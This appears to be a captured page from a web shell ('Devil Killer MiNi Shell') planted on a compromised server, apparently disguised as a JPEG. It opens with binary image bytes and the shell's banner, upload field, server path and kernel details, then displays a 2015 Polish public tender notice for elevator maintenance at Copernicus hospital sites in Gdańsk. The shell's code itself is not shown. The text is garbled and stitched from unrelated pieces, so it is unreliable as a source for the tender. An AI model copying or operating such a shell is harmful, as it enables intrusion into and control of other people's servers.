JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150827/221050-N-2015.html

<p class="kh_header"><b>Gdańsk: Utrzymania w zdolności techniczno-eksploatacyjnej i ruchowej dźwigów (wind) D10.251.61.T.2015</b><br>
<b>Numer ogłoszenia: 221050 - 2015; data zamieszczenia: 27.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Copernicus Podmiot Leczniczy Spółka z ograniczoną odpowiedzialnością , ul. Nowe Ogrody 1-6, 80-803 Gdańsk, woj. pomorskie, tel. 58 768 42 81, 58 468 46 40, faks 58 761 46 29, 58 768 48 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.copernicus.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymania w zdolności techniczno-eksploatacyjnej i ruchowej dźwigów (wind) D10.251.61.T.2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.
Przedmiotem zamówienia  jest wykonywanie konserwacji dźwigów w obiektach Copernicus Podmiot Leczniczy  Sp. z o.o. z siedzibą w Gdańsku z podziałem na dwie części:

1) PAKIET I obejmuje konserwację 29 dźwigów w okresie 39  miesięcy w obiektach:
-	Gdańsk, ulica Nowe Ogrody 1/6,
- 	Gdańsk, ulica Powstańców Warszawskich 1-2.
Szczegółowy wykaz urządzeń wymieniono w załączniku AI do SIWZ stanowiącym odpowiednio załącznik nr 1 do umowy.

2) PAKIET II  obejmuje konserwację 18 dźwigów w okresie 36 miesięcy w obiektach:
-	Gdańsk, Aleja Jana Pawła II 50,
-	Gdańsk, ulica Majewskich 22,
-	Gdańsk, ulica Jakuba Wejhera 12.
	Szczegółowy wykaz urządzeń wymieniono w załączniku  AII do SIWZ 	stanowiącym odpowiednio załącznik nr 1 do umowy .

1.	Na przedmiot zamówienia składa się:

a) Wykonywanie przy użyciu własnych narzędzi usług w zakresie utrzymania w zdolności techniczno eksploatacyjnej i ruchowej  oraz utrzymanie w nieprzerwanym bezawaryjnym działaniu urządzeń dźwigowych wymienionych w załączniku AI i AII do SIWZ stanowiących odpowiednio załącznik nr 1 do umowy,  a w szczególności wykonywanie konserwacji i przeglądów technicznych zgodnie z zaleceniami producenta urządzeń oraz innych czynności wynikających z bieżącej eksploatacji i koniecznych w celu zapewnienia ich bezpiecznego i bezawaryjnego użytkowania, usuwania awarii i ich skutków oraz napraw mechanizmów i urządzeń dźwigowych wymienionych w załączniku nr 1 do  umowy  .

b) Wykonywanie wymaganych przez Urząd Dozoru Technicznego oraz producenta urządzeń corocznych wszelkich pomiarów, wraz ze sporządzeniem odpowiednich protokołów z wynikami tych badań.

c)  Wykonywanie modernizacji, montaży i demontaży  uszkodzonych w trakcie eksploatacji mechanizmów i urządzeń oraz wydawanie orzeczeń technicznych dla urządzeń wymienionych w załączniku AI i AII  do SIWZ stanowiących odpowiednio załącznik nr 1 do umowy .

d) Zapewnienie dostępności materiałów i części zamiennych dla urządzeń wymienionych w załączniku AI i AII do SIWZ .

e) Potwierdzanie kart napraw i przeglądów po wykonaniu usług.

f) Zapoznawanie Zamawiającego  ze sposobem prawidłowej obsługi i eksploatacji,

g) Dokonywanie stosownych wpisów w paszportach technicznych urządzeń.

h) Zapewnienie własnego transportu uszkodzonych urządzeń do punktu serwisowego i z powrotem.

i) Zapewnienie <dyżuru dźwigowego> przez 24 godziny na dobę przez 7 dni w tygodniu. Wykonawca zobowiązuje się do utrzymania powierzonych urządzeń dźwigowych w stałym ruchu z wyjątkiem postoju niezbędnego do wykonania czynności konserwacyjno-naprawczych. Postój, o którym mowa nie może trwać dłużej niż 8 godzin. W przypadku wystąpienia wypadków nagłych, w których zagrożone jest życie osób, w tym między innymi zacięcie osób w dźwigu, Wykonawca jest zobowiązany do przysłania w miejsce użytkowania dźwigu pogotowie techniczne w ciągu maksymalnie 60 minut od chwili zgłoszenia.

j) Pisemne informowanie z odpowiednim wyprzedzeniem (miesięcznym) Działu Technicznego Zamawiającego o konieczności zaplanowania wymaganych modernizacji urządzeń wyszczególnionych w załączniku  AI i AII do SIWZ .

k) Przygotowywanie urządzeń do badań technicznych wykonywanych przez Urząd Dozoru Technicznego.

l) Wymiana drobnych elementów eksploatacyjnych takich jak żarówki, świetlówki , startery oświetleniowe, bezpieczniki, styczniki, podkładki, uszczelki, śruby, nakrętki, wkręty do drewna i metalu, zawleczki, zatrzaski, przyciski  - w wynagrodzeniu ryczałtowym określonym w § 6 ust. 1 lit.a   umowy . (szczegółowy wykaz stanowi załącznik B do SIWZ ).

2.	W skład bieżących (wykonywanych raz w miesiącu) konserwacji i przeglądów wchodzą w szczególności:

1) Przegląd zespołów i części dźwigowych w zakresie ich wyglądu, stopnia zużycia,
	wielkości luzów, a zwłaszcza w szczelności:
a) oględziny zespołu napędowego, hamulca oraz ogranicznika prędkości,
b) oględziny aparatury sterowej,
c) oględziny elementów nośnych,
d) sprawdzenia działania kontaktów bezpieczeństwa w tym: rygli drzwi, kontaktów
	drzwi, ogranicznika, obcążki, chwytaczy oraz wyłączników krańcowych,
e) stanu cięgien nośnych i ich zamocowania,
f) działania urządzeń napędowych, sterujących, sygnalizacyjnych i oświetleniowych.
2) Czyszczenie i smarowanie elementów dźwigu.
3) Regulację:
a) kontaktów bezpieczeństwa,
b) dokładnego dojazdu do przystanku,
c) zamykania drzwi przystankowych,
d) nastaw w aparaturze sterowej.

3. skład okresowych (wykonywanych raz w roku) pomiarów elektrycznych wchodzą w szczególności:

a) pomiary izolacji przewodów,
b) pomiary skuteczności ochrony przeciwporażeniowej,
c) pomiary uziemień i połączeń ochronnych i wyrównawczych,
d) pomiary zabezpieczeń termicznych dźwigów.

4. Nazwa przedmiotu wg Wspólnego Słownika Zamówień CPV: 50750000-7 Usługi w zakresie konserwacji wind.
5. Szczegółowe warunki, na jakich będzie realizowany przedmiot zamówienia opisany został szczegółowo w załączniku nr 7I i 7II  (postanowienia umowy) stanowiące integralną część niniejszej specyfikacji. 
 6. Liczba mechanizmów i urządzeń dźwigowych (wind, dźwigów) wynosi dla PAKIETU I 29 a dla PAKIETU II 18. Szczegółowy wykaz mechanizmów i urządzeń dźwigowych zawierają  załącznik AI i AII do SIWZ
7.  Dokumentacja techniczna urządzeń będzie do wglądu w Dziale Techniczno-Eksploatacyjnym w Copernicus Podmiot Leczniczy , przy ul. Nowe Ogrody 1-6 w Gdańsku w pokoju 107.
8. Zamawiający zastrzega sobie prawo do ograniczenia zakresu przedmiotu umowy w granicach 30 % zarówno co do rodzaju czynności jak i ilości urządzeń, ze względu na aktualne potrzeby Zamawiającego . W takim przypadku wynagrodzenie wykonawcy zostanie odpowiednio zmniejszone. W przypadku ograniczenia ilości urządzeń - wynagrodzenie zostanie pomniejszone o kwotę stanowiącą wartość wskazaną w ofercie wykonawcy dla tego urządzenia.
9.  W przypadku przedmiotu zamówienia lub jego elementu określonego przy pomocy nazw handlowych Zamawiający dopuszcza składanie ofert na asortyment równoważny pod każdym względem, tj. składu, gramatury, zakresu, spektrum i czasu działania, postaci, funkcji itp. W przypadku asortymentu równoważnego wykonawca jest zobowiązany określić jego nazwę handlową..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
 1. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. Wykonawca przystępujący do postępowania obowiązany jest do wniesienia wadium  w wysokości: 
Pakiet I:  	   5 000,00 zł
Pakiet II:   	   5 000,00 zł
2. Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz.1158, z póź. zm.). 
3. Sposób wniesienia wadium:
a) w przypadku wnoszenia wadium w pieniądzu: 
Wykonawca powinien dokonać przelewu na rachunek bankowy Zamawiającego:  Copernicus PL Sp. z o.o. ul. Nowe Ogrody 1-6, 80-803 Gdańsk :  PKO BP 18 1440 1101 0000 0000 1114 3938 
przed terminem składania ofert, z podaniem tytułu <wadium - D10.251.54.D.2015>   Datą wniesienia wadium jest data uznania rachunku Zamawiającego.
Dowodem wniesienia wadium będzie potwierdzony przez bank odcinek polecenia dokonania przelewu lub wydruk przelewu elektronicznego, przy czym w terminie określonym dla wniesienia wadium środki powinny znaleźć się na rachunku bankowym Zamawiającego. Kserokopię potwierdzenia dokonanego przelewu należy dołączyć do oferty.
b) w przypadku wnoszenia wadium w postaci poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo-kredytowej: 
Wykonawca powinien przedłożyć pismo będące poręczeniem banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawione przez poręczyciela, zawierające informację o udzieleniu poręczenia na kwotę wymienioną w pkt. 1, stanowiące zabezpieczenie wadium na rzecz Zamawiającego w przetargu nieograniczonym dla Copernicus Podmiot Leczniczy Sp. z o.o., ważne przez okres związania ofertą, określony w niniejszej specyfikacji oraz zobowiązanie poręczyciela do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego w przypadkach określonych w art. 46 ustawy Pzp,
c)  w przypadku wniesienia wadium w gwarancjach bankowych. 
Wykonawca powinien przedłożyć pisemną gwarancję udzieloną przez bank, zgodnie z wymaganiami określonymi przez prawo bankowe, obowiązującą przez okres związania ofertą, określony w niniejszej specyfikacji na kwotę wymienioną w pkt. 1, zawierającą informację, iż udzielona gwarancja stanowi zabezpieczenie wadium na rzecz Zamawiającego w przetargu nieograniczonym dla Copernicus Podmiot Leczniczy Sp. z o.o. oraz zobowiązanie gwaranta do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego w przypadkach określonych w  art. 46 ustawy Pzp,
d)  w przypadku wniesienia wadium w gwarancjach ubezpieczeniowych: 
Wykonawca powinien przedłożyć pisemną gwarancję udzieloną przez firmę ubezpieczeniową, obowiązującą przez okres związania ofertą, określony w niniejszej specyfikacji na kwotę wymienioną w pkt. 1, zawierającą informację, iż udzielona gwarancja stanowi zabezpieczenie wadium na rzecz Zamawiającego w przetargu nieograniczonym dla Copernicus Podmiot Leczniczy Sp. z o.o. oraz zobowiązanie gwaranta do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego w przypadkach określonych w art. 46 ustawy Pzp,
e)  w przypadku wniesienia wadium w postaci poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust. 5 pkt  2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości: 
Wykonawca powinien przedłożyć pismo będące poręczeniem wskazanych podmiotów, wystawione przez poręczyciela, zawierające informację o udzieleniu poręczenia na kwotę wymienioną w pkt. 1, stanowiące zabezpieczenie wadium na rzecz Zamawiającego, w przetargu nieograniczonym dla  Copernicus Podmiot Leczniczy Sp. z o.o. 
4. Do oferty należy dołączyć oryginał dokumentu (poręczenie bankowe, poręczenie spółdzielczej kasy oszczędnościowo - kredytowej, gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.), a w przypadku wniesienia wadium w pieniądzu należy do oferty dołączyć kserokopię potwierdzenia dokonanego przelewu.
5. Wadium musi być udzielane do końca terminu związania ofertą.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
6. Wadium wnosi się przed upływem terminu składania ofert.
7. Z treści gwarancji (poręczenia) winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą - zobowiązanie gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w przepisie art. 46 ust. 4a oraz ust. 5  ustawy - Prawo zamówień publicznych. 
8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonymi o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy. Dyspozycję w zakresie zwrotu wadium wniesionego w pieniądzu dla Wykonawcy, którego oferta została wybrana, Zamawiający przekaże do realizacji niezwłocznie po zawarciu umowy. 
9. Warunki zwrotu wadium i utraty wadium reguluje art. 46 PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi wymagany dokument - oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum jedną usługę polegającą na utrzymaniu w zdolności techniczno-eksploatacyjnej i ruchowej mechanizmów i urządzeń dźwigowych (wind, dźwigów) o wartości co najmniej 200 000 tys. zł brutto. Przy usłudze nie zakończonej Zamawiający będzie uznawał usługi wykonane w wymaganej wartości do dnia składania ofert</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca dysponuje lub będzie dysponować osobami w ilości wystarczającej do zabezpieczenia całodobowego pogotowia dźwigowego i zabezpieczenia eksploatacji w ruchu ciągłym, w tym co najmniej 2 osoby z których każda posiada:
a) uprawnienia UDT do konserwacji dźwigów w kategorii I zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym, oraz
b) aktualne uprawnienia kwalifikacyjne do wykonywania pracy na stanowisku eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu do 1KV.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca dysponuje lub będzie dysponować osobami w ilości wystarczającej do zabezpieczenia całodobowego pogotowia dźwigowego i zabezpieczenia eksploatacji w ruchu ciągłym, w tym co najmniej 2 osoby z których każda posiada:
a) uprawnienia UDT do konserwacji dźwigów w kategorii I zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym, oraz
b) aktualne uprawnienia kwalifikacyjne do wykonywania pracy na stanowisku eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu do 1KV.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi wymagany dokument - oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.                                                                                                         5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w ust. 1 pkt. 1.4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w zdaniu pierwszym, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentowania wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
6. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w § 1 pkt. 6.2. Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013, poz. 231) tj. dokumentów dotyczących w szczególności:
- 	zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu    zamówienia,
-   charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
